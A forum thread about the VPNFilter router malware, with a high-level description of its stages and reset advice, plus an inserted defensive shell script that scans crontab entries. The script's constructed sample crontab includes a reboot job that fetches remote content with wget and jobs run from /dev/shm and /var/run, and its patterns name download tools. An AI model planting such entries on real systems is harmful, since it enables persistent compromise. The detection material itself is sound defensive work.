VPNFilter Attacks Home Routers

Discussion in 'Hardware' started by booman, Jun 5, 2018.

  1. booman

    booman Grand High Exalted Mystic Emperor of Linux Gaming Staff Member

    Joined:
    Dec 17, 2012
    Messages:
    7,269
    Likes Received:
    527
    Trophy Points:
    113
    Location:
    Linux, Arizona
    Have you guys heard of this Router attack?
    How does it work exactly?
    How does it affect Linux users?

    https://www.experian.com/blogs/ask-...king-your-wifi-router-heres-how-to-stop-them/

    1. Stage 1 involves a worm and adds it to the crontab, the list of tasks run at regular intervals by the cron scheduler on Linux. This allows it to remain on the device, to re-infect it with the subsequent stages if they are removed.
    2. Stage 2 is the actual body of the malware, including the basic code that carries out all normal functions and executes any instructions requested by special, optional Stage 3 modules.
    3. Stage 3 can be any of various "modules" that tell the malware to do specific things, like spying on industrial control devices (Modbus SCADA) or using secure "dark web" Tor software to communicate via encryption.[4]
    Last edited: Jun 6, 2018
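
The Stage 1 persistence quoted above relies on a crontab entry, so reviewing cron entries is one way to check a Linux device you can log in to. The script below is an added example, not part of any post in this thread; the directory and tool patterns it flags are illustrative assumptions rather than published VPNFilter indicators, and the sample crontab is constructed.

```shell
#!/bin/sh
# Added example. The path and tool patterns below are illustrative
# assumptions, not published VPNFilter indicators.

# audit_cron [FILE...]: read crontab-format text (files, or stdin when no
# file is given) and print "LINE_NO: REASON: COMMAND" for entries worth a look.
audit_cron() {
    awk '
    /^[ \t]*#/ || /^[ \t]*$/ { next }                # comments, blank lines
    /^[ \t]*[A-Za-z_][A-Za-z0-9_]*[ \t]*=/ { next }  # VAR=value settings
    {
        cmd = $0
        n = ($1 ~ /^@/) ? 1 : 5                      # "@reboot" or 5 time fields
        for (i = 1; i <= n; i++) sub(/^[ \t]*[^ \t]+/, "", cmd)
        sub(/^[ \t]+/, "", cmd)
        shown = cmd
        # Drop redirection targets so ">/tmp/job.log" alone is not flagged.
        gsub(/[0-9]*>>?[ \t]*[^ \t;|&]+/, "", cmd)
        reason = ""
        # A program or script referenced under a volatile, writable directory.
        if (cmd ~ "(^|[^A-Za-z0-9_./-])/(tmp|var/tmp|var/run|dev/shm)/")
            reason = "volatile-path"
        # A scheduled job that downloads something.
        if (cmd ~ "(^|[^A-Za-z0-9_-])(wget|curl|tftp)([ \t]|$)")
            reason = reason (reason ? "," : "") "remote-fetch"
        if (reason) printf "%d: %s: %s\n", FNR, reason, shown
    }' "$@"
}

# Constructed sample crontab (the address is a documentation-range value).
sample_crontab() {
    cat <<'EOF'
# m h dom mon dow command
PATH=/usr/sbin:/usr/bin:/sbin:/bin
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf >/tmp/logrotate.out 2>&1
*/5 * * * * /var/run/updater
@reboot wget -q -O - http://192.0.2.10/job
30 2 * * * root sh /dev/shm/.cache/run.sh
15 4 * * 0 /usr/bin/find /home -name core -delete
EOF
}

sample_crontab | audit_cron
```

On a real system, pipe `crontab -l` into `audit_cron`, or pass it files such as `/etc/crontab`; a flagged line is a prompt to look closer, not proof of infection.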
  2. danrok

    danrok Administrator Staff Member

    Joined:
    Dec 7, 2012
    Messages:
    1,365
    Likes Received:
    14
    Trophy Points:
    38
    Location:
    Channel Islands
    There's more here:
    https://en.wikipedia.org/wiki/VPNFilter

    They say resetting a router to factory defaults would wipe it, and that not using the default password for your router makes it less likely to become infected.
  3. booman

    So the router itself is infected?
    Like the embedded Linux OS in it?
  4. danrok

  5. booman

    That is brilliant and "not cool" at the same time.
    Hacking an embedded Linux on a router and recording data passing through it.
    I might reset mine just to be sure.
  6. cloasters

    cloasters Well-Known Member

    Joined:
    Jul 3, 2013
    Messages:
    1,833
    Likes Received:
    43
    Trophy Points:
    48
    Yes, I'll pull the plug on mine one more time.